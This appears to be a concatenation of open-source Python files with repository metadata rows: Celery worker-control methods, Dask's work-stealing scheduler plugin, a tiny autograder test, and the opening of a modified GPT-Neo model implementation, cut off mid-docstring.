def rate_limit(self, task_name, rate_limit, destination=None, **kwargs):
"""Tell workers to set a new rate limit for task by type.
Arguments:
task_name (str): Name of task to change rate limit for.
rate_limit (int, str): The rate limit as tasks per second,
or a rate limit string (`'100/m'`, etc.
see :attr:`celery.task.base.Task.rate_limit` for
more information).
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'rate_limit',
destination=destination,
arguments={
'task_name': task_name,
'rate_limit': rate_limit,
},
**kwargs)
def add_consumer(self, queue,
exchange=None, exchange_type='direct', routing_key=None,
options=None, destination=None, **kwargs):
"""Tell all (or specific) workers to start consuming from a new queue.
Only the queue name is required as if only the queue is specified
then the exchange/routing key will be set to the same name (
like automatic queues do).
Note:
This command does not respect the default queue/exchange
options in the configuration.
Arguments:
queue (str): Name of queue to start consuming from.
exchange (str): Optional name of exchange.
exchange_type (str): Type of exchange (defaults to 'direct')
command to, when empty broadcast to all workers.
routing_key (str): Optional routing key.
options (Dict): Additional options as supported
by :meth:`kombu.entitiy.Queue.from_dict`.
See Also:
:meth:`broadcast` for supported keyword arguments.
"""
return self.broadcast(
'add_consumer',
destination=destination,
arguments=dict({
'queue': queue,
'exchange': exchange,
'exchange_type': exchange_type,
'routing_key': routing_key,
}, **options or {}),
**kwargs
)
def cancel_consumer(self, queue, destination=None, **kwargs):
"""Tell all (or specific) workers to stop consuming from ``queue``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'cancel_consumer', destination=destination,
arguments={'queue': queue}, **kwargs)
def time_limit(self, task_name, soft=None, hard=None,
destination=None, **kwargs):
"""Tell workers to set time limits for a task by type.
Arguments:
task_name (str): Name of task to change time limits for.
soft (float): New soft time limit (in seconds).
hard (float): New hard time limit (in seconds).
**kwargs (Any): arguments passed on to :meth:`broadcast`.
"""
return self.broadcast(
'time_limit',
arguments={
'task_name': task_name,
'hard': hard,
'soft': soft,
},
destination=destination,
**kwargs)
def enable_events(self, destination=None, **kwargs):
"""Tell all (or specific) workers to enable events.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'enable_events', arguments={}, destination=destination, **kwargs)
def disable_events(self, destination=None, **kwargs):
"""Tell all (or specific) workers to disable events.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'disable_events', arguments={}, destination=destination, **kwargs)
def pool_grow(self, n=1, destination=None, **kwargs):
"""Tell all (or specific) workers to grow the pool by ``n``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'pool_grow', arguments={'n': n}, destination=destination, **kwargs)
def pool_shrink(self, n=1, destination=None, **kwargs):
"""Tell all (or specific) workers to shrink the pool by ``n``.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'pool_shrink', arguments={'n': n},
destination=destination, **kwargs)
def autoscale(self, max, min, destination=None, **kwargs):
"""Change worker(s) autoscale setting.
See Also:
Supports the same arguments as :meth:`broadcast`.
"""
return self.broadcast(
'autoscale', arguments={'max': max, 'min': min},
destination=destination, **kwargs)
def shutdown(self, destination=None, **kwargs):
"""Shutdown worker(s).
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'shutdown', arguments={}, destination=destination, **kwargs)
def pool_restart(self, modules=None, reload=False, reloader=None,
destination=None, **kwargs):
"""Restart the execution pools of all or specific workers.
Keyword Arguments:
modules (Sequence[str]): List of modules to reload.
reload (bool): Flag to enable module reloading. Default is False.
reloader (Any): Function to reload a module.
destination (Sequence[str]): List of worker names to send this
command to.
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'pool_restart',
arguments={
'modules': modules,
'reload': reload,
'reloader': reloader,
},
destination=destination, **kwargs)
def heartbeat(self, destination=None, **kwargs):
"""Tell worker(s) to send a heartbeat immediately.
See Also:
Supports the same arguments as :meth:`broadcast`
"""
return self.broadcast(
'heartbeat', arguments={}, destination=destination, **kwargs)
def broadcast(self, command, arguments=None, destination=None,
connection=None, reply=False, timeout=1.0, limit=None,
callback=None, channel=None, pattern=None, matcher=None,
**extra_kwargs):
"""Broadcast a control command to the celery workers.
Arguments:
command (str): Name of command to send.
arguments (Dict): Keyword arguments for the command.
destination (List): If set, a list of the hosts to send the
command to, when empty broadcast to all workers.
connection (kombu.Connection): Custom broker connection to use,
if not set, a connection will be acquired from the pool.
reply (bool): Wait for and return the reply.
timeout (float): Timeout in seconds to wait for the reply.
limit (int): Limit number of replies.
callback (Callable): Callback called immediately for
each reply received.
pattern (str): Custom pattern string to match
matcher (Callable): Custom matcher to run the pattern to match
"""
with self.app.connection_or_acquire(connection) as conn:
arguments = dict(arguments or {}, **extra_kwargs)
if pattern and matcher:
# tests pass easier without requiring pattern/matcher to
# always be sent in
return self.mailbox(conn)._broadcast(
command, arguments, destination, reply, timeout,
limit, callback, channel=channel,
pattern=pattern, matcher=matcher,
)
else:
return self.mailbox(conn)._broadcast(
command, arguments, destination, reply, timeout,
limit, callback, channel=channel,
)
| 34.924843 | 79 | 0.593819 | [
"MIT"
] | DTrafford/IDPS | idps/lib/python3.7/site-packages/celery/app/control.py | 16,729 | Python |
from __future__ import annotations
import asyncio
import logging
from collections import defaultdict, deque
from math import log2
from time import time
from typing import Container
from tlz import topk
from tornado.ioloop import PeriodicCallback
import dask
from dask.utils import parse_timedelta
from .comm.addressing import get_address_host
from .core import CommClosedError
from .diagnostics.plugin import SchedulerPlugin
from .utils import log_errors, recursive_to_dict
# Stealing requires multiple network bounces and if successful also task
# submission which may include code serialization. Therefore, be very
# conservative in the latency estimation to suppress too aggressive stealing
# of small tasks
LATENCY = 0.1
logger = logging.getLogger(__name__)
LOG_PDB = dask.config.get("distributed.admin.pdb-on-err")
_WORKER_STATE_CONFIRM = {
"ready",
"constrained",
"waiting",
}
_WORKER_STATE_REJECT = {
"memory",
"executing",
"long-running",
"cancelled",
"resumed",
}
_WORKER_STATE_UNDEFINED = {
"released",
None,
}
class WorkStealing(SchedulerPlugin):
def __init__(self, scheduler):
self.scheduler = scheduler
# { level: { task states } }
self.stealable_all = [set() for i in range(15)]
# { worker: { level: { task states } } }
self.stealable = dict()
# { task state: (worker, level) }
self.key_stealable = dict()
self.cost_multipliers = [1 + 2 ** (i - 6) for i in range(15)]
self.cost_multipliers[0] = 1
for worker in scheduler.workers:
self.add_worker(worker=worker)
self._callback_time = parse_timedelta(
dask.config.get("distributed.scheduler.work-stealing-interval"),
default="ms",
)
# `callback_time` is in milliseconds
self.scheduler.add_plugin(self)
self.scheduler.extensions["stealing"] = self
self.scheduler.events["stealing"] = deque(maxlen=100000)
self.count = 0
# { task state: <stealing info dict> }
self.in_flight = dict()
# { worker state: occupancy }
self.in_flight_occupancy = defaultdict(lambda: 0)
self._in_flight_event = asyncio.Event()
self.scheduler.stream_handlers["steal-response"] = self.move_task_confirm
async def start(self, scheduler=None):
"""Start the background coroutine to balance the tasks on the cluster.
Idempotent.
The scheduler argument is ignored. It is merely required to satisify the
plugin interface. Since this class is simultaneouly an extension, the
scheudler instance is already registered during initialization
"""
if "stealing" in self.scheduler.periodic_callbacks:
return
pc = PeriodicCallback(
callback=self.balance, callback_time=self._callback_time * 1000
)
pc.start()
self.scheduler.periodic_callbacks["stealing"] = pc
self._in_flight_event.set()
async def stop(self):
"""Stop the background task balancing tasks on the cluster.
This will block until all currently running stealing requests are
finished. Idempotent
"""
pc = self.scheduler.periodic_callbacks.pop("stealing", None)
if pc:
pc.stop()
await self._in_flight_event.wait()
def _to_dict(self, *, exclude: Container[str] = ()) -> dict:
"""
A very verbose dictionary representation for debugging purposes.
Not type stable and not inteded for roundtrips.
Parameters
----------
comm:
exclude:
A list of attributes which must not be present in the output.
See also
--------
Client.dump_cluster_state
"""
return recursive_to_dict(
{
"stealable_all": self.stealable_all,
"stealable": self.stealable,
"key_stealable": self.key_stealable,
"in_flight": self.in_flight,
"in_flight_occupancy": self.in_flight_occupancy,
},
exclude=exclude,
)
def log(self, msg):
return self.scheduler.log_event("stealing", msg)
def add_worker(self, scheduler=None, worker=None):
self.stealable[worker] = [set() for i in range(15)]
def remove_worker(self, scheduler=None, worker=None):
del self.stealable[worker]
def teardown(self):
pcs = self.scheduler.periodic_callbacks
if "stealing" in pcs:
pcs["stealing"].stop()
del pcs["stealing"]
def transition(
self, key, start, finish, compute_start=None, compute_stop=None, *args, **kwargs
):
if finish == "processing":
ts = self.scheduler.tasks[key]
self.put_key_in_stealable(ts)
elif start == "processing":
ts = self.scheduler.tasks[key]
self.remove_key_from_stealable(ts)
d = self.in_flight.pop(ts, None)
if d:
thief = d["thief"]
victim = d["victim"]
self.in_flight_occupancy[thief] -= d["thief_duration"]
self.in_flight_occupancy[victim] += d["victim_duration"]
if not self.in_flight:
self.in_flight_occupancy.clear()
self._in_flight_event.set()
def recalculate_cost(self, ts):
if ts not in self.in_flight:
self.remove_key_from_stealable(ts)
self.put_key_in_stealable(ts)
def put_key_in_stealable(self, ts):
cost_multiplier, level = self.steal_time_ratio(ts)
if cost_multiplier is not None:
ws = ts.processing_on
worker = ws.address
self.stealable_all[level].add(ts)
self.stealable[worker][level].add(ts)
self.key_stealable[ts] = (worker, level)
def remove_key_from_stealable(self, ts):
result = self.key_stealable.pop(ts, None)
if result is None:
return
worker, level = result
try:
self.stealable[worker][level].remove(ts)
except KeyError:
pass
try:
self.stealable_all[level].remove(ts)
except KeyError:
pass
def steal_time_ratio(self, ts):
"""The compute to communication time ratio of a key
Returns
-------
cost_multiplier: The increased cost from moving this task as a factor.
For example a result of zero implies a task without dependencies.
level: The location within a stealable list to place this value
"""
split = ts.prefix.name
if split in fast_tasks:
return None, None
if not ts.dependencies: # no dependencies fast path
return 0, 0
ws = ts.processing_on
compute_time = ws.processing[ts]
if compute_time < 0.005: # 5ms, just give up
return None, None
nbytes = ts.get_nbytes_deps()
transfer_time = nbytes / self.scheduler.bandwidth + LATENCY
cost_multiplier = transfer_time / compute_time
if cost_multiplier > 100:
return None, None
level = int(round(log2(cost_multiplier) + 6))
if level < 1:
level = 1
return cost_multiplier, level
def move_task_request(self, ts, victim, thief) -> str:
try:
if ts in self.in_flight:
return "in-flight"
stimulus_id = f"steal-{time()}"
key = ts.key
self.remove_key_from_stealable(ts)
logger.debug(
"Request move %s, %s: %2f -> %s: %2f",
key,
victim,
victim.occupancy,
thief,
thief.occupancy,
)
victim_duration = victim.processing[ts]
thief_duration = self.scheduler.get_task_duration(
ts
) + self.scheduler.get_comm_cost(ts, thief)
self.scheduler.stream_comms[victim.address].send(
{"op": "steal-request", "key": key, "stimulus_id": stimulus_id}
)
self.in_flight[ts] = {
"victim": victim, # guaranteed to be processing_on
"thief": thief,
"victim_duration": victim_duration,
"thief_duration": thief_duration,
"stimulus_id": stimulus_id,
}
self._in_flight_event.clear()
self.in_flight_occupancy[victim] -= victim_duration
self.in_flight_occupancy[thief] += thief_duration
return stimulus_id
except CommClosedError:
logger.info("Worker comm %r closed while stealing: %r", victim, ts)
return "comm-closed"
except Exception as e:
logger.exception(e)
if LOG_PDB:
import pdb
pdb.set_trace()
raise
async def move_task_confirm(self, *, key, state, stimulus_id, worker=None):
try:
ts = self.scheduler.tasks[key]
except KeyError:
logger.debug("Key released between request and confirm: %s", key)
return
try:
d = self.in_flight.pop(ts)
if d["stimulus_id"] != stimulus_id:
self.log(("stale-response", key, state, worker, stimulus_id))
self.in_flight[ts] = d
return
except KeyError:
self.log(("already-aborted", key, state, stimulus_id))
return
thief = d["thief"]
victim = d["victim"]
logger.debug("Confirm move %s, %s -> %s. State: %s", key, victim, thief, state)
self.in_flight_occupancy[thief] -= d["thief_duration"]
self.in_flight_occupancy[victim] += d["victim_duration"]
if not self.in_flight:
self.in_flight_occupancy.clear()
self._in_flight_event.set()
if self.scheduler.validate:
assert ts.processing_on == victim
try:
_log_msg = [key, state, victim.address, thief.address, stimulus_id]
if ts.state != "processing":
self.log(("not-processing", *_log_msg))
old_thief = thief.occupancy
new_thief = sum(thief.processing.values())
old_victim = victim.occupancy
new_victim = sum(victim.processing.values())
thief.occupancy = new_thief
victim.occupancy = new_victim
self.scheduler.total_occupancy += (
new_thief - old_thief + new_victim - old_victim
)
elif (
state in _WORKER_STATE_UNDEFINED
or state in _WORKER_STATE_CONFIRM
and thief.address not in self.scheduler.workers
):
self.log(
(
"reschedule",
thief.address not in self.scheduler.workers,
*_log_msg,
)
)
self.scheduler.reschedule(key)
# Victim had already started execution
elif state in _WORKER_STATE_REJECT:
self.log(("already-computing", *_log_msg))
# Victim was waiting, has given up task, enact steal
elif state in _WORKER_STATE_CONFIRM:
self.remove_key_from_stealable(ts)
ts.processing_on = thief
duration = victim.processing.pop(ts)
victim.occupancy -= duration
self.scheduler.total_occupancy -= duration
if not victim.processing:
self.scheduler.total_occupancy -= victim.occupancy
victim.occupancy = 0
thief.processing[ts] = d["thief_duration"]
thief.occupancy += d["thief_duration"]
self.scheduler.total_occupancy += d["thief_duration"]
self.put_key_in_stealable(ts)
self.scheduler.send_task_to_worker(thief.address, ts)
self.log(("confirm", *_log_msg))
else:
raise ValueError(f"Unexpected task state: {state}")
except Exception as e:
logger.exception(e)
if LOG_PDB:
import pdb
pdb.set_trace()
raise
finally:
self.scheduler.check_idle_saturated(thief)
self.scheduler.check_idle_saturated(victim)
def balance(self):
s = self.scheduler
def combined_occupancy(ws):
return ws.occupancy + self.in_flight_occupancy[ws]
def maybe_move_task(level, ts, sat, idl, duration, cost_multiplier):
occ_idl = combined_occupancy(idl)
occ_sat = combined_occupancy(sat)
if occ_idl + cost_multiplier * duration <= occ_sat - duration / 2:
self.move_task_request(ts, sat, idl)
log.append(
(
start,
level,
ts.key,
duration,
sat.address,
occ_sat,
idl.address,
occ_idl,
)
)
s.check_idle_saturated(sat, occ=occ_sat)
s.check_idle_saturated(idl, occ=occ_idl)
with log_errors():
i = 0
idle = s.idle.values()
saturated = s.saturated
if not idle or len(idle) == len(s.workers):
return
log = []
start = time()
if not s.saturated:
saturated = topk(10, s.workers.values(), key=combined_occupancy)
saturated = [
ws
for ws in saturated
if combined_occupancy(ws) > 0.2 and len(ws.processing) > ws.nthreads
]
elif len(s.saturated) < 20:
saturated = sorted(saturated, key=combined_occupancy, reverse=True)
if len(idle) < 20:
idle = sorted(idle, key=combined_occupancy)
for level, cost_multiplier in enumerate(self.cost_multipliers):
if not idle:
break
for sat in list(saturated):
stealable = self.stealable[sat.address][level]
if not stealable or not idle:
continue
for ts in list(stealable):
if ts not in self.key_stealable or ts.processing_on is not sat:
stealable.discard(ts)
continue
i += 1
if not idle:
break
if _has_restrictions(ts):
thieves = [ws for ws in idle if _can_steal(ws, ts, sat)]
else:
thieves = idle
if not thieves:
break
thief = thieves[i % len(thieves)]
duration = sat.processing.get(ts)
if duration is None:
stealable.discard(ts)
continue
maybe_move_task(
level, ts, sat, thief, duration, cost_multiplier
)
if self.cost_multipliers[level] < 20: # don't steal from public at cost
stealable = self.stealable_all[level]
for ts in list(stealable):
if not idle:
break
if ts not in self.key_stealable:
stealable.discard(ts)
continue
sat = ts.processing_on
if sat is None:
stealable.discard(ts)
continue
if combined_occupancy(sat) < 0.2:
continue
if len(sat.processing) <= sat.nthreads:
continue
i += 1
if _has_restrictions(ts):
thieves = [ws for ws in idle if _can_steal(ws, ts, sat)]
else:
thieves = idle
if not thieves:
continue
thief = thieves[i % len(thieves)]
duration = sat.processing[ts]
maybe_move_task(
level, ts, sat, thief, duration, cost_multiplier
)
if log:
self.log(log)
self.count += 1
stop = time()
if s.digests:
s.digests["steal-duration"].add(stop - start)
def restart(self, scheduler):
for stealable in self.stealable.values():
for s in stealable:
s.clear()
for s in self.stealable_all:
s.clear()
self.key_stealable.clear()
def story(self, *keys):
keys = {key.key if not isinstance(key, str) else key for key in keys}
out = []
for _, L in self.scheduler.get_events(topic="stealing"):
if not isinstance(L, list):
L = [L]
for t in L:
if any(x in keys for x in t):
out.append(t)
return out
def _has_restrictions(ts):
"""Determine whether the given task has restrictions and whether these
restrictions are strict.
"""
return not ts.loose_restrictions and (
ts.host_restrictions or ts.worker_restrictions or ts.resource_restrictions
)
def _can_steal(thief, ts, victim):
"""Determine whether worker ``thief`` can steal task ``ts`` from worker
``victim``.
Assumes that `ts` has some restrictions.
"""
if (
ts.host_restrictions
and get_address_host(thief.address) not in ts.host_restrictions
):
return False
elif ts.worker_restrictions and thief.address not in ts.worker_restrictions:
return False
if victim.resources is None:
return True
for resource, value in victim.resources.items():
try:
supplied = thief.resources[resource]
except KeyError:
return False
else:
if supplied < value:
return False
return True
fast_tasks = {"split-shuffle"}
| 34.15942 | 88 | 0.537123 | [
"BSD-3-Clause"
] | ncclementi/distributed | distributed/stealing.py | 18,856 | Python |
# Solution for the test LAB
#!/usr/bin/env python
print("Solucionado")
| 17.75 | 27 | 0.732394 | [
"Apache-2.0"
] | ManuelLecaro/simplePythonAutograderAutolab | autograder_test/src/test.py | 71 | Python |
# coding=utf-8
# Copyright 2021 The Eleuther AI and HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch GPT Neo model. """
"""Modified from the original at transformers library @ commit b24ead87e1be6bce17e4ec5c953b6d028e4b3af7 -nost"""
import os
from typing import Tuple
import torch
import torch.utils.checkpoint
from torch import nn
from torch.nn import CrossEntropyLoss
from transformers.activations import ACT2FN
from transformers.file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from transformers.modeling_outputs import (
BaseModelOutputWithPast,
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
CausalLMOutputWithPast,
)
from transformers.modeling_utils import PreTrainedModel
from transformers.utils import logging
from transformers.models.gpt_neo.configuration_gpt_neo import GPTNeoConfig
from transformer_utils.partial_forward import AfterStoppingPointException
class LazyLinearAPICompatible(nn.LazyLinear):
def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:
super().__init__(out_features=out_features, bias=bias)
logger = logging.get_logger(__name__)
_CONFIG_FOR_DOC = "GPTNeoConfig"
_TOKENIZER_FOR_DOC = "GPT2Tokenizer"
GPT_NEO_PRETRAINED_MODEL_ARCHIVE_LIST = [
"EleutherAI/gpt-neo-1.3B",
# See all GPTNeo models at https://huggingface.co/models?filter=gpt_neo
]
_CHECKPOINT_FOR_DOC = "EleutherAI/gpt-neo-1.3B"
def load_tf_weights_in_gpt_neo(model, config, gpt_neo_checkpoint_path):
"""Load tf checkpoints in a pytorch model"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(gpt_neo_checkpoint_path)
logger.info(f"Converting TensorFlow checkpoint from {tf_path}")
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
if "global_step" not in name and "adam" not in name:
array = tf.train.load_variable(tf_path, name)
array = tf.dtypes.cast(array.squeeze(), tf.float32).numpy()
name = name.replace("attn/q", "attn/attention/q_proj/w")
name = name.replace("attn/k", "attn/attention/k_proj/w")
name = name.replace("attn/v", "attn/attention/v_proj/w")
name = name.replace("attn/o", "attn/attention/out_proj/w")
name = name.replace("norm_1", "ln_1")
name = name.replace("norm_2", "ln_2")
name = name.replace("attn/compute_output_bias/o_b", "attn/attention/out_proj/b")
name = name.replace("conv1d_main/c_fc/kernel", "c_fc/w")
name = name.replace("conv1d_main/c_fc/bias", "c_fc/b")
name = name.replace("conv1d_main/c_proj/kernel", "c_proj/w")
name = name.replace("conv1d_main/c_proj/bias", "c_proj/b")
names.append(name)
arrays.append(array)
for name, array in zip(names, arrays):
name = name[5:] # skip "gpt2/"
name = name.split("/")
pointer = model.transformer
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if name[-1] == "w" and name[-2] in ["out_proj", "k_proj", "q_proj", "v_proj", "c_proj", "c_fc"]:
array = array.transpose()
if name == ["wte"]:
# if vocab is padded, then trim off the padding embeddings
array = array[: config.vocab_size]
try:
assert (
pointer.shape == array.shape
), f"Pointer shape {pointer.shape} and array shape {array.shape} mismatched {name}"
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
print(f"Initialize PyTorch weight {name}")
pointer.data = torch.from_numpy(array)
# init the final linear layer using word embeddings
embs = model.transformer.wte.weight
lin = LazyLinearAPICompatible(embs.size()[1], embs.size()[0], bias=False)
lin.weight = embs
model.set_output_embeddings(lin)
return model
class GPTNeoAttentionMixin:
"""
A few attention related utilities for attention modules in GPT Neo, to be used as a mixin.
"""
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
if len(tensor.shape) == 5:
return tensor.permute(0, 1, 3, 2, 4) # (batch, blocks, head, block_length, head_features)
elif len(tensor.shape) == 4:
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
else:
raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}")
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
if len(tensor.shape) == 5:
tensor = tensor.permute(0, 1, 3, 2, 4).contiguous()
elif len(tensor.shape) == 4:
tensor = tensor.permute(0, 2, 1, 3).contiguous()
else:
raise ValueError(f"Input tensor rank should be one of [4, 5], but is: {len(tensor.shape)}")
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def _attn(self, query, key, value, causal_mask, masked_bias, attn_dropout, attention_mask=None, head_mask=None):
# Keep the attention weights computation in fp32 to avoid overflow issues
query = query.to(torch.float32)
key = key.to(torch.float32)
# print(("query", query.shape, "key", key.transpose(-1, -2).shape))
attn_weights = torch.matmul(query, key.transpose(-1, -2))
attn_weights = torch.where(causal_mask, attn_weights, masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
attn_weights = attn_weights.to(value.dtype)
attn_weights = attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
class GPTNeoSelfAttention(nn.Module, GPTNeoAttentionMixin):
def __init__(self, attention_type, config):
super().__init__()
self.window_size = None
max_positions = config.max_position_embeddings
bias = torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
).bool()
if attention_type == "local":
self.register_buffer(
"bias",
bias ^ torch.tril(bias, -config.window_size),
)
else:
self.register_buffer(
"bias",
bias,
)
self.register_buffer("masked_bias", torch.tensor(-1e9))
self.attn_dropout = nn.Dropout(config.attention_dropout)
self.resid_dropout = nn.Dropout(config.resid_dropout)
self.embed_dim = config.hidden_size
self.num_heads = config.num_heads
self.head_dim = self.embed_dim // self.num_heads
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"embed_dim must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`: {self.num_heads})."
)
self.k_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.v_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.q_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=False)
self.out_proj = LazyLinearAPICompatible(self.embed_dim, self.embed_dim, bias=True)
def forward(
self,
hidden_states,
attention_mask=None,
layer_past=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
query = self.q_proj(hidden_states)
key = self.k_proj(hidden_states)
value = self.v_proj(hidden_states)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key = layer_past[0]
past_value = layer_past[1]
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length]
attn_output, attn_weights = self._attn(
query, key, value, causal_mask, self.masked_bias, self.attn_dropout, attention_mask, head_mask
)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.out_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class GPTNeoAttention(nn.Module):
def __init__(self, config, layer_id=0):
super().__init__()
self.layer_id = layer_id
self.attention_layers = config.attention_layers
self.attention_type = self.attention_layers[layer_id]
if self.attention_type in ["global", "local"]:
self.attention = GPTNeoSelfAttention(self.attention_type, config)
else:
raise NotImplementedError(
"Only attn layer types 'global' and 'local' exist, but got `config.attention_layers`: "
f"{config.attention_layers}. Select attn layer types from ['global', 'local'] only."
)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
outputs = self.attention(
hidden_states,
attention_mask=attention_mask,
layer_past=layer_past,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
return outputs
class GPTNeoMLP(nn.Module):
def __init__(self, intermediate_size, config): # in MLP: intermediate_size= 4 * hidden_size
super().__init__()
embed_dim = config.hidden_size
self.c_fc = LazyLinearAPICompatible(embed_dim, intermediate_size)
self.c_proj = LazyLinearAPICompatible(intermediate_size, embed_dim)
self.act = ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_dropout)
def forward(self, hidden_states):
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class GPTNeoBlock(nn.Module):
def __init__(self, config, layer_id):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.intermediate_size if config.intermediate_size is not None else 4 * hidden_size
self.ln_1 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.attn = GPTNeoAttention(config, layer_id)
self.ln_2 = nn.LayerNorm(hidden_size, eps=config.layer_norm_epsilon)
self.mlp = GPTNeoMLP(inner_dim, config)
def forward(
self,
hidden_states,
layer_past=None,
attention_mask=None,
head_mask=None,
use_cache=False,
output_attentions=False,
):
residual = hidden_states
hidden_states = self.ln_1(hidden_states)
attn_outputs = self.attn(
hidden_states,
layer_past=layer_past,
attention_mask=attention_mask,
head_mask=head_mask,
use_cache=use_cache,
output_attentions=output_attentions,
)
attn_output = attn_outputs[0] # output_attn: a, present, (attentions)
outputs = attn_outputs[1:]
# residual connection
hidden_states = attn_output + residual
residual = hidden_states
hidden_states = self.ln_2(hidden_states)
feed_forward_hidden_states = self.mlp(hidden_states)
# residual connection
hidden_states = residual + feed_forward_hidden_states
if use_cache:
outputs = (hidden_states,) + outputs
else:
outputs = (hidden_states,) + outputs[1:]
return outputs # hidden_states, present, (attentions, cross_attentions)
class GPTNeoPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = GPTNeoConfig
load_tf_weights = load_tf_weights_in_gpt_neo
base_model_prefix = "transformer"
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, (LazyLinearAPICompatible,)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
GPT_NEO_START_DOCSTRING = r"""
This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic
methods the library implements for all its model (such as downloading or saving, resizing the input embeddings,
pruning heads etc.)
This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__
subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to
general usage and behavior.
Parameters:
config (:class:`~transformers.GPTNeoConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
GPT_NEO_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, input_ids_length)`):
:obj:`input_ids_length` = ``sequence_length`` if :obj:`past_key_values` is ``None`` else
``past_key_values[0][0].shape[-2]`` (``sequence_length`` of input past key value states). Indices of input
sequence tokens in the vocabulary.
If :obj:`past_key_values` is used, only ``input_ids`` that do not have their past calculated should be
